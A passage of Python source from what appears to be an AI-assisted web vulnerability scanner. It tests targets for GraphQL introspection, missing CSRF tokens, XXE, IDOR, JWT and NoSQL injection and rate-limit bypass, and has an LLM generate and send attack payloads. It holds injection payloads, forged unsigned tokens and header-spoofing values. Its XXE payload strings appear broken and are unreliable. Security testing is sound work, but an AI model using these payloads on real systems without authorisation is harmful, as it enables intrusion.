"""Test for GraphQL introspection exposure"""
await self.log("info", " Testing for GraphQL introspection...")
parsed = urlparse(self.target)
base = f"{parsed.scheme}://{parsed.netloc}"
graphql_paths = ["/graphql", "/api/graphql", "/v1/graphql", "/query"]
introspection_query = '{"query":"{__schema{types{name}}}"}'
for path in graphql_paths:
url = base + path
try:
async with self.session.post(
url,
data=introspection_query,
headers={"Content-Type": "application/json"},
) as resp:
if resp.status == 200:
body = await resp.text()
if "__schema" in body or "queryType" in body:
vt = "graphql_introspection"
if not self.memory.has_finding_for(vt, url, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vt, {})
finding = Finding(
id=hashlib.md5(f"{vt}{url}".encode()).hexdigest()[:8],
title="GraphQL Introspection Enabled",
severity="medium",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cvss_vector=self._get_cvss_vector(vt),
cwe_id="CWE-200",
description=info.get("description", "GraphQL introspection is enabled, exposing the full API schema."),
affected_endpoint=url,
evidence="__schema data returned from introspection query",
remediation=info.get("remediation", "Disable introspection in production."),
affected_urls=[url],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] GraphQL introspection at {path}")
return
except:
pass
async def _test_csrf_inspection(self):
"""Test for CSRF protection on forms"""
await self.log("info", " Testing for CSRF protection...")
for form in self.recon.forms[:10]:
if form.get("method", "GET").upper() != "POST":
continue
action = form.get("action", "")
inputs = form.get("inputs", [])
# Check if form has CSRF token
csrf_names = {"csrf", "_token", "csrfmiddlewaretoken", "authenticity_token",
"__RequestVerificationToken", "_csrf", "csrf_token"}
has_token = any(
inp.lower() in csrf_names
for inp in inputs
if isinstance(inp, str)
)
if not has_token and action:
vt = "csrf"
if not self.memory.has_finding_for(vt, action, ""):
info = self.vuln_registry.VULNERABILITY_INFO.get(vt, {})
finding = Finding(
id=hashlib.md5(f"{vt}{action}".encode()).hexdigest()[:8],
title="Missing CSRF Protection",
severity="medium",
vulnerability_type=vt,
cvss_score=self._get_cvss_score(vt),
cvss_vector=self._get_cvss_vector(vt),
cwe_id="CWE-352",
description=f"POST form at {action} lacks CSRF token protection.",
affected_endpoint=action,
evidence=f"No CSRF token found in form fields: {inputs[:5]}",
remediation=info.get("remediation", "Implement CSRF tokens for all state-changing requests."),
affected_urls=[action],
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] Missing CSRF protection at {action[:50]}")
async def _ai_dynamic_test(self, user_prompt: str):
"""
AI-driven dynamic vulnerability testing - can test ANY vulnerability type.
The LLM generates payloads, test strategies, and analyzes results dynamically.
Examples of what this can test:
- XXE (XML External Entity)
- Race Conditions
- Rate Limiting Bypass
- WAF Bypass
- CSP Bypass
- BFLA (Broken Function Level Authorization)
- BOLA (Broken Object Level Authorization)
- JWT vulnerabilities
- GraphQL injection
- NoSQL injection
- Prototype pollution
- And ANY other vulnerability type!
"""
await self.log("info", f"[AI DYNAMIC TEST] Processing: {user_prompt}")
if not self.llm.is_available():
await self.log("warning", " LLM not available - attempting basic tests based on prompt")
await self._ai_test_fallback(user_prompt)
return
# Gather reconnaissance context
endpoints_info = []
for ep in self.recon.endpoints[:15]:
url = _get_endpoint_url(ep)
method = _get_endpoint_method(ep)
if url:
endpoints_info.append({"url": url, "method": method})
forms_info = []
for form in self.recon.forms[:5]:
if isinstance(form, dict):
forms_info.append({
"action": form.get("action", ""),
"method": form.get("method", "GET"),
"inputs": form.get("inputs", [])[:5]
})
context = f"""
TARGET: {self.target}
TECHNOLOGIES: {', '.join(self.recon.technologies) if self.recon.technologies else 'Unknown'}
ENDPOINTS ({len(endpoints_info)} found):
{json.dumps(endpoints_info[:10], indent=2)}
FORMS ({len(forms_info)} found):
{json.dumps(forms_info, indent=2)}
PARAMETERS DISCOVERED: {list(self.recon.parameters.keys())[:20]}
"""
# RAG: Get testing context for the vulnerability type
rag_dynamic_ctx = self._get_rag_testing_context(user_prompt) if (self.rag_engine or self.few_shot_selector) else ""
# Playbook: Get methodology for this vuln type if identifiable
playbook_dynamic_ctx = ""
if HAS_PLAYBOOK:
try:
# Try to match user_prompt to a known vuln type
prompt_lower = user_prompt.lower().replace(" ", "_").replace("-", "_")
entry = get_playbook_entry(prompt_lower)
if not entry:
# Fuzzy match: try common substrings
for vtype in ["xss", "sqli", "ssrf", "idor", "csrf", "xxe", "ssti",
"lfi", "rfi", "rce", "command_injection", "open_redirect"]:
if vtype in prompt_lower:
entry = get_playbook_entry(vtype) or get_playbook_entry(f"{vtype}_reflected")
if entry:
prompt_lower = vtype
break
if entry:
prompts = get_testing_prompts(prompt_lower)
bypass = get_bypass_strategies(prompt_lower)
playbook_dynamic_ctx = f"\n--- PLAYBOOK METHODOLOGY for {entry.get('title', prompt_lower)} ---\n"
playbook_dynamic_ctx += f"Overview: {entry.get('overview', '')}\n"
playbook_dynamic_ctx += f"Threat Model: {entry.get('threat_model', '')}\n"
if prompts:
playbook_dynamic_ctx += f"Key Testing Prompts:\n"
for p in prompts[:5]:
playbook_dynamic_ctx += f" - {p}\n"
if bypass:
playbook_dynamic_ctx += f"Bypass Strategies: {', '.join(bypass[:5])}\n"
except Exception:
pass
# Phase 1: Ask AI to understand the vulnerability and create test strategy
strategy_prompt = f"""You are an expert penetration tester. The user wants to test for:
"{user_prompt}"
Based on the target information below, create a comprehensive testing strategy.
{context}
{rag_dynamic_ctx}{playbook_dynamic_ctx}
Respond in JSON format with:
{{
"vulnerability_type": "name of the vulnerability being tested",
"cwe_id": "CWE-XXX if applicable",
"owasp_category": "OWASP category if applicable",
"description": "Brief description of what this vulnerability is",
"severity_if_found": "critical|high|medium|low",
"cvss_estimate": 0.0-10.0,
"test_cases": [
{{
"name": "Test case name",
"technique": "Technique being used",
"url": "URL to test (use actual URLs from context)",
"method": "GET|POST|PUT|DELETE",
"headers": {{"Header-Name": "value"}},
"body": "request body if POST/PUT",
"content_type": "application/json|application/xml|application/x-www-form-urlencoded",
"success_indicators": ["what to look for in response that indicates vulnerability"],
"failure_indicators": ["what indicates NOT vulnerable"]
}}
],
"payloads": ["list of specific payloads to try"],
"analysis_tips": "What patterns or behaviors indicate this vulnerability"
}}
Generate at least 3-5 realistic test cases using the actual endpoints from the context.
Be creative and thorough - think like a real penetration tester."""
await self.log("info", " Phase 1: AI generating test strategy...")
try:
strategy_response = await self.llm.generate(
strategy_prompt,
self._get_enhanced_system_prompt("strategy")
)
# Extract JSON from response
match = re.search(r'\{[\s\S]*\}', strategy_response)
if not match:
await self.log("warning", " AI did not return valid JSON strategy, using fallback")
await self._ai_test_fallback(user_prompt)
return
strategy = json.loads(match.group())
vuln_type = strategy.get("vulnerability_type", user_prompt)
cwe_id = strategy.get("cwe_id", "")
severity = strategy.get("severity_if_found", "medium")
cvss = strategy.get("cvss_estimate", 5.0)
description = strategy.get("description", f"Testing for {vuln_type}")
await self.log("info", f" Vulnerability: {vuln_type}")
await self.log("info", f" CWE: {cwe_id} | Severity: {severity} | CVSS: {cvss}")
await self.log("info", f" Test cases: {len(strategy.get('test_cases', []))}")
# Phase 2: Execute test cases
await self.log("info", " Phase 2: Executing AI-generated test cases...")
test_results = []
for i, test_case in enumerate(strategy.get("test_cases", [])[:10]):
test_name = test_case.get("name", f"Test {i+1}")
await self.log("debug", f" Running: {test_name}")
result = await self._execute_ai_dynamic_test(test_case)
if result:
result["test_name"] = test_name
result["success_indicators"] = test_case.get("success_indicators", [])
result["failure_indicators"] = test_case.get("failure_indicators", [])
test_results.append(result)
# Phase 3: AI analysis of results
await self.log("info", " Phase 3: AI analyzing results...")
analysis_prompt = f"""Analyze these test results for {vuln_type} vulnerability.
VULNERABILITY BEING TESTED: {vuln_type}
{description}
ANALYSIS TIPS: {strategy.get('analysis_tips', 'Look for error messages, unexpected behavior, or data leakage')}
TEST RESULTS:
{json.dumps(test_results[:5], indent=2, default=str)[:8000]}
For each test result, analyze if it indicates a vulnerability.
Consider:
- Success indicators: {strategy.get('test_cases', [{}])[0].get('success_indicators', [])}
- Response status codes, error messages, timing differences, data in response
Respond in JSON:
{{
"findings": [
{{
"is_vulnerable": true|false,
"confidence": "high|medium|low",
"test_name": "which test",
"evidence": "specific evidence from response",
"explanation": "why this indicates vulnerability"
}}
],
"overall_assessment": "summary of findings",
"recommendations": ["list of remediation steps"]
}}"""
analysis_response = await self.llm.generate(
analysis_prompt,
self._get_enhanced_system_prompt("confirmation")
)
# Parse analysis
analysis_match = re.search(r'\{[\s\S]*\}', analysis_response)
if analysis_match:
analysis = json.loads(analysis_match.group())
for finding_data in analysis.get("findings", []):
if finding_data.get("is_vulnerable") and finding_data.get("confidence") in ["high", "medium"]:
evidence = finding_data.get("evidence", "")
test_name = finding_data.get("test_name", "AI Test")
# Find the matching test result for endpoint + body
affected_endpoint = self.target
matched_body = ""
for tr in test_results:
if tr.get("test_name") == test_name:
affected_endpoint = tr.get("url", self.target)
matched_body = tr.get("body", "")
break
# Anti-hallucination: verify AI evidence in actual response
if evidence and matched_body:
if not self._evidence_in_response(evidence, matched_body):
await self.log("debug", f" [REJECTED] AI claimed evidence not found in response for {test_name}")
self.memory.reject_finding(
type("F", (), {"vulnerability_type": vuln_type, "affected_endpoint": affected_endpoint, "parameter": ""})(),
f"AI evidence not grounded in HTTP response: {evidence[:100]}"
)
continue
# Get metadata from registry if available
mapped = self._map_vuln_type(vuln_type.lower().replace(" ", "_"))
reg_title = self.vuln_registry.get_title(mapped)
reg_cwe = self.vuln_registry.get_cwe_id(mapped)
reg_remediation = self.vuln_registry.get_remediation(mapped)
finding = Finding(
id=hashlib.md5(f"{vuln_type}{affected_endpoint}{test_name}".encode()).hexdigest()[:8],
title=reg_title or f"{vuln_type}",
severity=severity,
vulnerability_type=vuln_type.lower().replace(" ", "_"),
cvss_score=float(cvss) if cvss else 5.0,
cvss_vector=self._get_cvss_vector(vuln_type.lower().replace(" ", "_")),
cwe_id=reg_cwe or cwe_id or "",
description=f"{description}\n\nAI Explanation: {finding_data.get('explanation', '')}",
affected_endpoint=affected_endpoint,
evidence=evidence[:1000],
remediation=reg_remediation or "\n".join(analysis.get("recommendations", [])),
ai_verified=True
)
await self._add_finding(finding)
await self.log("warning", f" [AI FOUND] {vuln_type} - {finding_data.get('confidence')} confidence")
await self.log("info", f" Assessment: {analysis.get('overall_assessment', 'Analysis complete')[:100]}")
except json.JSONDecodeError as e:
await self.log("warning", f" JSON parse error: {e}")
await self._ai_test_fallback(user_prompt)
except Exception as e:
await self.log("error", f" AI dynamic test error: {e}")
await self._ai_test_fallback(user_prompt)
async def _execute_ai_dynamic_test(self, test_case: Dict) -> Optional[Dict]:
"""Execute a single AI-generated test case"""
if not self.session:
return None
try:
url = test_case.get("url", self.target)
method = test_case.get("method", "GET").upper()
headers = test_case.get("headers", {})
body = test_case.get("body", "")
content_type = test_case.get("content_type", "")
if content_type and "Content-Type" not in headers:
headers["Content-Type"] = content_type
start_time = asyncio.get_event_loop().time()
if method == "GET":
async with self.session.get(url, headers=headers, allow_redirects=False) as resp:
response_body = await resp.text()
response_time = asyncio.get_event_loop().time() - start_time
return {
"url": url,
"method": method,
"status": resp.status,
"headers": dict(list(resp.headers.items())[:20]),
"body_preview": response_body[:2000],
"body_length": len(response_body),
"response_time": round(response_time, 3)
}
elif method == "POST":
if content_type == "application/json" and isinstance(body, str):
try:
body = json.loads(body)
except:
pass
async with self.session.post(url, headers=headers, data=body if isinstance(body, str) else None, json=body if isinstance(body, dict) else None, allow_redirects=False) as resp:
response_body = await resp.text()
response_time = asyncio.get_event_loop().time() - start_time
return {
"url": url,
"method": method,
"status": resp.status,
"headers": dict(list(resp.headers.items())[:20]),
"body_preview": response_body[:2000],
"body_length": len(response_body),
"response_time": round(response_time, 3)
}
elif method in ["PUT", "DELETE", "PATCH"]:
request_method = getattr(self.session, method.lower())
async with request_method(url, headers=headers, data=body, allow_redirects=False) as resp:
response_body = await resp.text()
response_time = asyncio.get_event_loop().time() - start_time
return {
"url": url,
"method": method,
"status": resp.status,
"headers": dict(list(resp.headers.items())[:20]),
"body_preview": response_body[:2000],
"body_length": len(response_body),
"response_time": round(response_time, 3)
}
except Exception as e:
return {
"url": url,
"method": method,
"error": str(e),
"status": 0
}
return None
# ── AI Deep Test: Iterative Human-Pentester Loop ─────────────────────
MAX_DEEP_TEST_ITERATIONS = 3
async def _ai_deep_test(
self,
url: str,
vuln_type: str,
params: List[str],
method: str = "GET",
form_defaults: Dict = None,
) -> Optional[Finding]:
"""AI-driven iterative testing loop — the core of LLM-as-VulnEngine.
Unlike hardcoded payload iteration, this method:
1. OBSERVES — builds rich context (baseline, tech, WAF, playbook, memory)
2. PLANS — asks LLM to generate targeted test cases
3. EXECUTES — sends requests, captures full responses
4. ANALYZES — LLM reviews actual responses with anti-hallucination
5. ADAPTS — if promising signals found, loops with refined tests
All confirmed findings go through _judge_finding() (ValidationJudge pipeline).
Returns the first confirmed Finding, or None.
"""
if not self.llm.is_available() or not self.session:
return None
if self.is_cancelled():
return None
# Token budget check — skip if budget exhausted
if self.token_budget and hasattr(self.token_budget, 'should_skip'):
if self.token_budget.should_skip("deep_test"):
return None
await self.log("debug", f" [AI-DEEP] {vuln_type} on {url[:60]}...")
# Step 1: OBSERVE — Build rich context
context = self._build_deep_test_context(
url, vuln_type, params, method, form_defaults
)
# Playbook context
playbook_ctx = ""
if HAS_PLAYBOOK:
try:
entry = get_playbook_entry(vuln_type)
if entry:
prompts = get_testing_prompts(vuln_type)
bypass = get_bypass_strategies(vuln_type)
anti_fp = get_anti_fp_rules(vuln_type)
playbook_ctx = f"\n## PLAYBOOK METHODOLOGY for {vuln_type}\n"
playbook_ctx += f"Overview: {entry.get('overview', '')}\n"
if prompts:
playbook_ctx += "Testing prompts:\n"
for p in prompts[:5]:
playbook_ctx += f" - {p}\n"
if bypass:
playbook_ctx += f"Bypass strategies: {', '.join(bypass[:5])}\n"
if anti_fp:
playbook_ctx += f"Anti-FP rules: {', '.join(anti_fp[:3])}\n"
except Exception:
pass
# Import the prompt builders
try:
from backend.core.vuln_engine.ai_prompts import (
get_deep_test_plan_prompt, get_deep_test_analysis_prompt
)
except ImportError:
return None
previous_results_json = ""
all_test_results = []
for iteration in range(1, self.MAX_DEEP_TEST_ITERATIONS + 1):
if self.is_cancelled():
return None
# Step 2: PLAN — AI generates targeted test cases
plan_prompt = get_deep_test_plan_prompt(
vuln_type=vuln_type,
context=context,
playbook_ctx=playbook_ctx,
iteration=iteration,
previous_results=previous_results_json,
)
try:
plan_response = await self.llm.generate(
plan_prompt,
self._get_enhanced_system_prompt("deep_testing", vuln_type)
)
except Exception as e:
await self.log("debug", f" [AI-DEEP] Plan error round {iteration}: {e}")
break
# Parse plan JSON
plan_match = re.search(r'\{[\s\S]*\}', plan_response)
if not plan_match:
await self.log("debug", f" [AI-DEEP] No JSON in plan response round {iteration}")
break
try:
plan = json.loads(plan_match.group())
except json.JSONDecodeError:
await self.log("debug", f" [AI-DEEP] JSON parse error round {iteration}")
break
tests = plan.get("tests", [])
if not tests:
await self.log("debug", f" [AI-DEEP] No tests generated round {iteration}")
break
reasoning = plan.get("reasoning", "")
if reasoning and iteration == 1:
await self.log("info", f" [AI-DEEP] Strategy: {reasoning[:120]}")
# Step 3: EXECUTE — Send requests, capture full responses
round_results = await self._execute_ai_planned_tests(tests, url, method)
all_test_results.extend(round_results)
if not round_results:
break
# Build baseline string for analysis
baseline_str = ""
baseline_resp = self.memory.get_baseline(url)
if baseline_resp:
baseline_str = (
f"Status: {baseline_resp.get('status', '?')}\n"
f"Headers: {json.dumps(dict(list(baseline_resp.get('headers', {}).items())[:10]), default=str)}\n"
f"Body preview: {baseline_resp.get('body', '')[:500]}\n"
f"Body length: {len(baseline_resp.get('body', ''))}"
)
# Step 4: ANALYZE — AI reviews actual responses
results_json = json.dumps(round_results[:5], indent=2, default=str)[:6000]
analysis_prompt = get_deep_test_analysis_prompt(
vuln_type=vuln_type,
test_results=results_json,
baseline=baseline_str,
iteration=iteration,
)
try:
analysis_response = await self.llm.generate(
analysis_prompt,
self._get_enhanced_system_prompt("confirmation", vuln_type)
)
except Exception as e:
await self.log("debug", f" [AI-DEEP] Analysis error round {iteration}: {e}")
break
# Parse analysis JSON
analysis_match = re.search(r'\{[\s\S]*\}', analysis_response)
if not analysis_match:
break
try:
analysis = json.loads(analysis_match.group())
except json.JSONDecodeError:
break
# Step 5: Check for confirmed findings
for finding_data in analysis.get("analysis", []):
if not finding_data.get("is_vulnerable"):
continue
if finding_data.get("confidence") not in ("high", "medium"):
continue
evidence = finding_data.get("evidence", "")
test_name = finding_data.get("test_name", "AI Deep Test")
# Find matching test result for endpoint + response
affected_endpoint = url
matched_body = ""
matched_resp = None
for tr in all_test_results:
if tr.get("test_name") == test_name or tr.get("name") == test_name:
affected_endpoint = tr.get("url", url)
matched_body = tr.get("body_preview", "")
matched_resp = tr
break
# Anti-hallucination: verify evidence exists in actual response
if evidence and matched_body:
if not self._evidence_in_response(evidence, matched_body):
await self.log("debug",
f" [AI-DEEP] REJECTED: evidence not grounded in response for {test_name}")
self.memory.reject_finding(
type("F", (), {
"vulnerability_type": vuln_type,
"affected_endpoint": affected_endpoint,
"parameter": ""
})(),
f"AI evidence not in response: {evidence[:100]}"
)
continue
# Extract payload from matching test
payload = ""
param_name = ""
if matched_resp:
payload = matched_resp.get("payload", "")
param_name = matched_resp.get("param", params[0] if params else "")
# Run through ValidationJudge pipeline
finding = await self._judge_finding(
vuln_type, affected_endpoint, param_name or (params[0] if params else ""),
payload, evidence, matched_resp or {},
baseline=baseline_resp
)
if finding:
await self.log("warning",
f" [AI-DEEP] CONFIRMED {vuln_type} round {iteration}: "
f"{finding_data.get('confidence')} confidence")
return finding
# Step 6: ADAPT — decide whether to continue
if not analysis.get("continue_testing", False):
await self.log("debug",
f" [AI-DEEP] {vuln_type}: done after round {iteration} "
f"({analysis.get('summary', 'no findings')})")
break
# Prepare previous results for next iteration
previous_results_json = results_json
next_strategy = analysis.get("next_round_strategy", "")
if next_strategy:
await self.log("debug", f" [AI-DEEP] Round {iteration + 1} strategy: {next_strategy[:80]}")
return None
def _build_deep_test_context(
self,
url: str,
vuln_type: str,
params: List[str],
method: str,
form_defaults: Dict = None,
) -> str:
"""Build rich observation context for the AI deep test loop.
Combines: endpoint details, baseline, tech stack, WAF info,
parameter analysis, and memory of previous tests.
"""
parsed = urlparse(url)
base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
# Endpoint details
parts = [
f"TARGET URL: {url}",
f"BASE URL: {base_url}",
f"METHOD: {method}",
f"PARAMETERS: {', '.join(params[:10]) if params else 'none discovered'}",
]
if form_defaults:
parts.append(f"FORM DEFAULTS: {json.dumps(form_defaults, default=str)[:300]}")
# Technology stack
if self.recon.technologies:
parts.append(f"TECHNOLOGIES: {', '.join(self.recon.technologies[:10])}")
# Baseline response
baseline = self.memory.get_baseline(url) or self.memory.get_baseline(base_url)
if baseline:
parts.append(f"\nBASELINE RESPONSE:")
parts.append(f" Status: {baseline.get('status', '?')}")
parts.append(f" Content-Type: {baseline.get('content_type', '?')}")
parts.append(f" Body length: {len(baseline.get('body', ''))}")
body_preview = baseline.get('body', '')[:300]
if body_preview:
parts.append(f" Body preview: {body_preview}")
# WAF information
if self._waf_result and self._waf_result.detected_wafs:
waf_names = [w.get('name', '?') if isinstance(w, dict) else str(w)
for w in self._waf_result.detected_wafs]
parts.append(f"\nWAF DETECTED: {', '.join(waf_names)}")
if self.waf_detector:
try:
bypasses = self.waf_detector.get_bypass_techniques(self._waf_result)
if bypasses:
parts.append(f"WAF BYPASS TECHNIQUES: {', '.join(bypasses[:5])}")
except Exception:
pass
# Parameter analysis
if self.param_analyzer and params:
try:
param_dict = {p: "" for p in params[:5]}
ranked = self.param_analyzer.rank_parameters(param_dict)
param_info = []
for name, score, vulns in ranked[:5]:
param_info.append(f" {name}: risk={score:.1f}, likely_vulns={vulns[:3]}")
if param_info:
parts.append(f"\nPARAMETER RISK ANALYSIS:")
parts.extend(param_info)
except Exception:
pass
# Memory: what was already tested
tested_payloads = []
for p in params[:3]:
if self.memory.was_tested(url, p, vuln_type) or self.memory.was_tested(base_url, p, vuln_type):
tested_payloads.append(f" {p}: already tested (skip)")
if tested_payloads:
parts.append(f"\nPREVIOUSLY TESTED (from memory):")
parts.extend(tested_payloads)
# RAG context
if self.rag_engine:
try:
rag_ctx = self._get_rag_testing_context(vuln_type, url)
if rag_ctx:
parts.append(f"\nRAG CONTEXT (historical patterns):")
parts.append(rag_ctx[:500])
except Exception:
pass
return "\n".join(parts)
async def _execute_ai_planned_tests(
self, tests: List[Dict], default_url: str, default_method: str
) -> List[Dict]:
"""Execute AI-planned test cases, return results with full responses.
Reuses _make_request() and _make_request_with_injection() for HTTP calls.
"""
results = []
for test in tests[:5]:
if self.is_cancelled():
break
test_url = test.get("url", default_url)
test_method = test.get("method", default_method).upper()
test_params = test.get("params", {})
test_headers = test.get("headers", {})
test_body = test.get("body", "")
test_name = test.get("name", "unnamed")
injection_point = test.get("injection_point", "parameter")
content_type = test.get("content_type", "")
try:
start_time = asyncio.get_event_loop().time()
if injection_point == "header" and test_headers:
# Use header injection for header-based tests
header_name = list(test_headers.keys())[0] if test_headers else "X-Test"
payload = test_headers.get(header_name, "")
resp = await self._make_request_with_injection(
test_url, test_method, payload,
injection_point="header", header_name=header_name
)
elif injection_point == "body" and test_body:
# Body injection
resp = await self._make_request_with_injection(
test_url, "POST", test_body,
injection_point="body", param_name="data"
)
elif test_params:
# Parameter injection (default)
resp = await self._make_request(test_url, test_method, test_params)
else:
# Plain request
resp = await self._make_request(test_url, test_method, {})
elapsed = asyncio.get_event_loop().time() - start_time
if resp:
# Extract the payload used for finding creation
payload_used = ""
param_used = ""
if test_params:
for k, v in test_params.items():
if v and len(str(v)) > 3:
payload_used = str(v)
param_used = k
break
result = {
"test_name": test_name,
"name": test_name,
"url": test_url,
"method": test_method,
"status": resp.get("status", 0),
"headers": {k: v for k, v in list(resp.get("headers", {}).items())[:15]},
"body_preview": resp.get("body", "")[:1500],
"body_length": len(resp.get("body", "")),
"response_time": round(elapsed, 3),
"payload": payload_used,
"param": param_used,
}
results.append(result)
else:
results.append({
"test_name": test_name,
"name": test_name,
"url": test_url,
"method": test_method,
"status": 0,
"error": "No response",
"body_preview": "",
"body_length": 0,
})
except Exception as e:
results.append({
"test_name": test_name,
"name": test_name,
"url": test_url,
"error": str(e),
"status": 0,
"body_preview": "",
"body_length": 0,
})
return results
async def _ai_test_fallback(self, user_prompt: str):
"""Fallback testing when LLM is not available - uses keyword detection"""
await self.log("info", f" Running fallback tests for: {user_prompt}")
prompt_lower = user_prompt.lower()
# Define fallback test mappings
fallback_tests = {
"xxe": self._test_xxe_fallback,
"xml": self._test_xxe_fallback,
"race": self._test_race_condition_fallback,
"rate": self._test_rate_limit_fallback,
"bola": self._test_idor_fallback,
"idor": self._test_idor_fallback,
"bfla": self._test_bfla_fallback,
"jwt": self._test_jwt_fallback,
"graphql": self._test_graphql_fallback,
"nosql": self._test_nosql_fallback,
"waf": self._test_waf_bypass_fallback,
"csp": self._test_csp_bypass_fallback,
}
tests_run = False
for keyword, test_func in fallback_tests.items():
if keyword in prompt_lower:
await test_func()
tests_run = True
if not tests_run:
await self.log("warning", " No fallback test matched. LLM required for this test type.")
async def _test_xxe_fallback(self):
"""Test for XXE without LLM"""
await self.log("info", " Testing XXE (XML External Entity)...")
xxe_payloads = [
']>&xxe; ',
']>&xxe; ',
'%xxe;]> ',
]
for endpoint in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:5]]:
if not endpoint:
continue
for payload in xxe_payloads:
try:
headers = {"Content-Type": "application/xml"}
async with self.session.post(endpoint, data=payload, headers=headers) as resp:
body = await resp.text()
if "root:" in body or "daemon:" in body or "ENTITY" in body.lower():
finding = Finding(
id=hashlib.md5(f"xxe{endpoint}".encode()).hexdigest()[:8],
title="XXE (XML External Entity) Injection",
severity="critical",
vulnerability_type="xxe",
cvss_score=9.1,
cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
cwe_id="CWE-611",
description="XML External Entity injection allows reading local files and potentially SSRF.",
affected_endpoint=endpoint,
payload=payload[:200],
evidence=body[:500],
remediation="Disable external entity processing in XML parsers. Use JSON instead of XML where possible.",
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] XXE at {endpoint[:50]}")
return
except:
pass
async def _test_race_condition_fallback(self):
"""Test for race conditions without LLM"""
await self.log("info", " Testing Race Conditions...")
# Find form endpoints that might be vulnerable
target_endpoints = []
for form in self.recon.forms[:3]:
if isinstance(form, dict):
action = form.get("action", "")
if action:
target_endpoints.append(action)
if not target_endpoints:
target_endpoints = [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3] if _get_endpoint_url(ep)]
for endpoint in target_endpoints:
try:
# Send multiple concurrent requests
tasks = []
for _ in range(10):
tasks.append(self.session.get(endpoint))
responses = await asyncio.gather(*[task.__aenter__() for task in tasks], return_exceptions=True)
# Check for inconsistent responses (potential race condition indicator)
statuses = [r.status for r in responses if hasattr(r, 'status')]
if len(set(statuses)) > 1:
await self.log("info", f" Inconsistent responses detected at {endpoint[:50]} - potential race condition")
except:
pass
async def _test_rate_limit_fallback(self):
"""Test for rate limiting bypass without LLM"""
await self.log("info", " Testing Rate Limiting...")
headers_to_try = [
{"X-Forwarded-For": "127.0.0.1"},
{"X-Real-IP": "127.0.0.1"},
{"X-Originating-IP": "127.0.0.1"},
{"X-Client-IP": "127.0.0.1"},
{"True-Client-IP": "127.0.0.1"},
]
for endpoint in [self.target]:
for headers in headers_to_try:
try:
# Send many requests
for i in range(20):
headers["X-Forwarded-For"] = f"192.168.1.{i}"
async with self.session.get(endpoint, headers=headers) as resp:
if resp.status == 429:
await self.log("info", f" Rate limit hit at request {i}")
break
if i == 19:
await self.log("warning", f" [POTENTIAL] No rate limiting detected with header bypass")
except:
pass
async def _test_idor_fallback(self):
"""Test for IDOR/BOLA without LLM"""
await self.log("info", " Testing IDOR/BOLA...")
# Find endpoints with numeric parameters
for param, endpoints in self.recon.parameters.items():
for endpoint in endpoints[:2]:
url = _get_endpoint_url(endpoint) if isinstance(endpoint, dict) else endpoint
if not url:
continue
# Try changing IDs
for test_id in ["1", "2", "0", "-1", "9999999"]:
try:
parsed = urlparse(url)
test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{param}={test_id}"
async with self.session.get(test_url) as resp:
if resp.status == 200:
body = await resp.text()
if len(body) > 100:
await self.log("debug", f" Got response for {param}={test_id}")
except:
pass
async def _test_bfla_fallback(self):
"""Test for BFLA without LLM"""
await self.log("info", " Testing BFLA (Broken Function Level Authorization)...")
admin_paths = ["/admin", "/api/admin", "/api/v1/admin", "/manage", "/dashboard", "/internal"]
for path in admin_paths:
try:
url = urljoin(self.target, path)
async with self.session.get(url) as resp:
if resp.status == 200:
await self.log("warning", f" [POTENTIAL] Admin endpoint accessible: {url}")
elif resp.status in [401, 403]:
await self.log("debug", f" Protected: {url}")
except:
pass
async def _test_jwt_fallback(self):
"""Test for JWT vulnerabilities without LLM"""
await self.log("info", " Testing JWT vulnerabilities...")
# Try none algorithm and other JWT attacks
jwt_tests = [
"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.",
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.test",
]
for endpoint in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3]]:
if not endpoint:
continue
for jwt in jwt_tests:
try:
headers = {"Authorization": f"Bearer {jwt}"}
async with self.session.get(endpoint, headers=headers) as resp:
if resp.status == 200:
await self.log("debug", f" JWT accepted at {endpoint[:50]}")
except:
pass
async def _test_graphql_fallback(self):
"""Test for GraphQL vulnerabilities without LLM"""
await self.log("info", " Testing GraphQL...")
graphql_endpoints = ["/graphql", "/api/graphql", "/v1/graphql", "/query"]
introspection_query = '{"query": "{ __schema { types { name } } }"}'
for path in graphql_endpoints:
try:
url = urljoin(self.target, path)
headers = {"Content-Type": "application/json"}
async with self.session.post(url, data=introspection_query, headers=headers) as resp:
if resp.status == 200:
body = await resp.text()
if "__schema" in body or "types" in body:
finding = Finding(
id=hashlib.md5(f"graphql{url}".encode()).hexdigest()[:8],
title="GraphQL Introspection Enabled",
severity="low",
vulnerability_type="graphql_introspection",
cvss_score=3.0,
cwe_id="CWE-200",
description="GraphQL introspection is enabled, exposing the entire API schema.",
affected_endpoint=url,
evidence=body[:500],
remediation="Disable introspection in production environments.",
ai_verified=False
)
await self._add_finding(finding)
await self.log("warning", f" [FOUND] GraphQL introspection at {url}")
except:
pass
async def _test_nosql_fallback(self):
"""Test for NoSQL injection without LLM"""
await self.log("info", " Testing NoSQL injection...")
nosql_payloads = [
'{"$gt": ""}',
'{"$ne": null}',
'{"$where": "1==1"}',
"[$gt]=&",
'{"username": {"$gt": ""}, "password": {"$gt": ""}}',
]
for param, endpoints in list(self.recon.parameters.items())[:5]:
for endpoint in endpoints[:2]:
url = _get_endpoint_url(endpoint) if isinstance(endpoint, dict) else endpoint
if not url:
continue
for payload in nosql_payloads:
try:
test_url = f"{url.split('?')[0]}?{param}={payload}"
async with self.session.get(test_url) as resp:
body = await resp.text()
if resp.status == 200 and len(body) > 100:
await self.log("debug", f" NoSQL payload accepted: {param}={payload[:30]}")
except:
pass
async def _test_waf_bypass_fallback(self):
"""Test for WAF bypass without LLM"""
